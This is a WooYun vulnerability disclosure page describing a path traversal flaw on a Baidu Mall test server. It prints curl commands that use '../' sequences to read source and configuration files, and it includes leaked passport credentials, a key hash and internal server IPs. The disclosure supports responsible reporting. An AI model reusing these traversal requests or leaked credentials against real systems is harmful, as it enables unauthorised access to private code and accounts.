当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133183

漏洞标题:百度某待上线业务配置错误导致源码泄露

相关厂商:百度

漏洞作者: 举起手来

提交时间:2015-08-11 09:39

修复时间:2015-09-25 11:30

公开时间:2015-09-25 11:30

漏洞类型:应用配置错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-11: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-21: 细节向核心白帽子及相关领域专家公开
2015-08-31: 细节向普通白帽子公开
2015-09-10: 细节向实习白帽子公开
2015-09-25: 细节向公众公开

简要描述:

杀器在手!说走就走啊~

详细说明:

百度商城,貌似还没上线的业务(MALL.baidu.com)啊;http://180.149.144.64 这个是测试环境,尼玛node.js的,屌的一笔。
首先是这样的。

[root@li498-106 ~]# curl "http://180.149.144.64/xxx"
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>百度Mall</title>
<link rel="shortcut icon" href="http://www.baidu.com/favicon.ico" >
<script src="/js/common/core.js"></script>
<script>
require.config({
waitSeconds: 30,
baseUrl: '/js'
});
</script>
</head>
<body>
<h2>Not Found, url:/xxx</h2>
Error: Not Found, url:/xxx
at /home/work/mall_online/mall/app.js:50:15
at Layer.handle [as handle_request] (/home/work/mall_online/mall/node_modules/express/lib/router/layer.js:82:5)
at trim_prefix (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:302:13)
at /home/work/mall_online/mall/node_modules/express/lib/router/index.js:270:7
at Function.proto.process_params (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:321:12)
at next (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:261:10)
at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/serve-static/index.js:107:7)
at SendStream.emit (events.js:107:17)
at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:250:17)
at SendStream.onStatError (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:346:48)
<script>
var GLOBAL_CONF = {"debug":true,"passport":{"host":"passport.rdtest.baidu.com","tpl":"cmovie"}};
</script>
</body>
</html>


有报错,目测可以读文件,原谅我没有能读取系统任意文件,但是代码文件是可以随意读

[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/../config/passport.js"
/**
* @file passport.js
* @author pengxing (pengxing@baidu.com)
* @description
* passport conf
*/
module.exports = {
host: 'wappass.baidu.com',
apid: 0x0523,
tpl: 'cmovie',
app_user: 'cmovie',
app_passwd: 'cmovie',
sapi: {
'cmovie_1315': '14c7e9fbcdb6d1eac8d6cc4b885babc8'
},
server: {
session: {
port: 7801,
timeout: 1000,
servers: []
}
}
};
// 机器列表 http://tc-passport-op00.tc.baidu.com/authorize/session/apply
// 根据当前的idc,来判断请求哪个passport
switch (process.env.IDC) {
case 'hz':
case 'nj':
// hz机房只有链接这两个机器才比较快
module.exports.server.session.servers = [
{
ip: '10.212.7.12'
},
{
ip: '10.208.7.34'
},
{
ip: '10.202.6.38'
}
];
break;
// bj机房连接这四个passport都很快
case 'bj':
default:
module.exports.server.session.servers = [
{
ip: '10.36.7.65'
},
{
ip: '10.65.211.140'
},
{
ip: '10.26.7.72'
},
{
ip: '10.81.211.104'
}
];
}
/////////////////////////////////////////
var globalConf = require('./global');
if (globalConf.debug) {
var offline = {
host: 'passport.rdtest.baidu.com',
server: {
session: {
port: 8998,
timeout: 3000,
servers: [
{
ip: "10.48.20.13"
}
]
}
}
};
module.exports.host = offline.host;
module.exports.server = offline.server;
}


[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/config.js"
var movie = require('./movie');
var users = require('./users');
var goodsList = require('./goodsList');
var index = require('./index');
var product = require('./product');
var cart = require('./cart');
var orderSure = require('./orderSure');
var address = require('./address');
var market = require('./market');
var shop = require('./shop');
var user = require('./user');
var dal = require('../lib/dal');
var url = require('./url');
var common = require('./common');
var test = require('./test');
var login = require('./login');
var flpurchase=require('./flpurchase');
module.exports = function(app) {
// 这个对象会作为前端的全局config对象使用
// 后续 config/categories 里的数据也用这种方式引入,避免每个请求都去处理一次。@shanshan
app.locals.frontendConfig = {
debug: require('../config/global').debug,
passport: {
host: require('../config/passport').host,
tpl: require('../config/passport').tpl,
}
};
app.locals.menuCategories = require('../config/categories');
// passport
var passport = require('../lib/middlewares/passport');
// app.use(passport.passport);
app.get('/user/loginInfo', passport.passport, function (req, res ,next) {
res.send(res.locals.user);
});
app.use('/test', test);
app.use('/login', login);
app.use('/flpurchase',flpurchase);
app.use('/common', common);
app.use(url.homeIndex, user);
app.get('/', index.home);
app.use('/shop', shop);
app.get('/movie/hot', movie.hot);
app.get('/users', users.index);
app.get('/goodsList', goodsList.search);
app.use('/product',product);
// app.get('/item/:id', product.product);
app.use('/cart', cart);
app.use('/market', market);
app.use('/order', orderSure);
app.use('/address', address);
};

漏洞证明:

百度商城,貌似还没上线的业务啊;http://180.149.144.64 这个是测试环境,尼玛node.js的,屌的一笔。
首先是这样的。

[root@li498-106 ~]# curl "http://180.149.144.64/xxx"
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<title>百度Mall</title>
<link rel="shortcut icon" href="http://www.baidu.com/favicon.ico" >
<script src="/js/common/core.js"></script>
<script>
require.config({
waitSeconds: 30,
baseUrl: '/js'
});
</script>
</head>
<body>
<h2>Not Found, url:/xxx</h2>
Error: Not Found, url:/xxx
at /home/work/mall_online/mall/app.js:50:15
at Layer.handle [as handle_request] (/home/work/mall_online/mall/node_modules/express/lib/router/layer.js:82:5)
at trim_prefix (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:302:13)
at /home/work/mall_online/mall/node_modules/express/lib/router/index.js:270:7
at Function.proto.process_params (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:321:12)
at next (/home/work/mall_online/mall/node_modules/express/lib/router/index.js:261:10)
at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/serve-static/index.js:107:7)
at SendStream.emit (events.js:107:17)
at SendStream.error (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:250:17)
at SendStream.onStatError (/home/work/mall_online/mall/node_modules/express/node_modules/send/index.js:346:48)
<script>
var GLOBAL_CONF = {"debug":true,"passport":{"host":"passport.rdtest.baidu.com","tpl":"cmovie"}};
</script>
</body>
</html>


有报错,目测可以读文件,原谅我没有能读取系统任意文件,但是代码文件是可以随意读

[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/../config/passport.js"
/**
* @file passport.js
* @author pengxing (pengxing@baidu.com)
* @description
* passport conf
*/
module.exports = {
host: 'wappass.baidu.com',
apid: 0x0523,
tpl: 'cmovie',
app_user: 'cmovie',
app_passwd: 'cmovie',
sapi: {
'cmovie_1315': '14c7e9fbcdb6d1eac8d6cc4b885babc8'
},
server: {
session: {
port: 7801,
timeout: 1000,
servers: []
}
}
};
// 机器列表 http://tc-passport-op00.tc.baidu.com/authorize/session/apply
// 根据当前的idc,来判断请求哪个passport
switch (process.env.IDC) {
case 'hz':
case 'nj':
// hz机房只有链接这两个机器才比较快
module.exports.server.session.servers = [
{
ip: '10.212.7.12'
},
{
ip: '10.208.7.34'
},
{
ip: '10.202.6.38'
}
];
break;
// bj机房连接这四个passport都很快
case 'bj':
default:
module.exports.server.session.servers = [
{
ip: '10.36.7.65'
},
{
ip: '10.65.211.140'
},
{
ip: '10.26.7.72'
},
{
ip: '10.81.211.104'
}
];
}
/////////////////////////////////////////
var globalConf = require('./global');
if (globalConf.debug) {
var offline = {
host: 'passport.rdtest.baidu.com',
server: {
session: {
port: 8998,
timeout: 3000,
servers: [
{
ip: "10.48.20.13"
}
]
}
}
};
module.exports.host = offline.host;
module.exports.server = offline.server;
}


[root@li498-106 ~]# curl "http://180.149.144.64/../../../../../../../../../../..//../../..//home/work/mall_online/mall/app/config.js"
var movie = require('./movie');
var users = require('./users');
var goodsList = require('./goodsList');
var index = require('./index');
var product = require('./product');
var cart = require('./cart');
var orderSure = require('./orderSure');
var address = require('./address');
var market = require('./market');
var shop = require('./shop');
var user = require('./user');
var dal = require('../lib/dal');
var url = require('./url');
var common = require('./common');
var test = require('./test');
var login = require('./login');
var flpurchase=require('./flpurchase');
module.exports = function(app) {
// 这个对象会作为前端的全局config对象使用
// 后续 config/categories 里的数据也用这种方式引入,避免每个请求都去处理一次。@shanshan
app.locals.frontendConfig = {
debug: require('../config/global').debug,
passport: {
host: require('../config/passport').host,
tpl: require('../config/passport').tpl,
}
};
app.locals.menuCategories = require('../config/categories');
// passport
var passport = require('../lib/middlewares/passport');
// app.use(passport.passport);
app.get('/user/loginInfo', passport.passport, function (req, res ,next) {
res.send(res.locals.user);
});
app.use('/test', test);
app.use('/login', login);
app.use('/flpurchase',flpurchase);
app.use('/common', common);
app.use(url.homeIndex, user);
app.get('/', index.home);
app.use('/shop', shop);
app.get('/movie/hot', movie.hot);
app.get('/users', users.index);
app.get('/goodsList', goodsList.search);
app.use('/product',product);
// app.get('/item/:id', product.product);
app.use('/cart', cart);
app.use('/market', market);
app.use('/order', orderSure);
app.use('/address', address);
};

修复方案:

~

版权声明:转载请注明来源 举起手来@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-08-11 11:29

厂商回复:

感谢提交

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-11 09:42 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    哈哈,跟百度过不去了。

  2. 2015-08-11 09:53 | 爱上平顶山 认证白帽子 ( 核心白帽子 | Rank:2738 漏洞数:547 | [不戴帽子]异乡过客.曾就职于天朝某机构.IT...)

    我猜你是谁~

  3. 2015-08-11 11:47 | 苏安泽 ( 实习白帽子 | Rank:73 漏洞数:25 | 敢不敢关注一下,<script>alert('关注成功'...)

    真的是跟百度过不去。天天日百度

  4. 2015-09-25 11:37 | 老实先生 ( 路人 | Rank:7 漏洞数:4 | 早日告别路人状态)

    百度还没摆好姿势呢,你就插?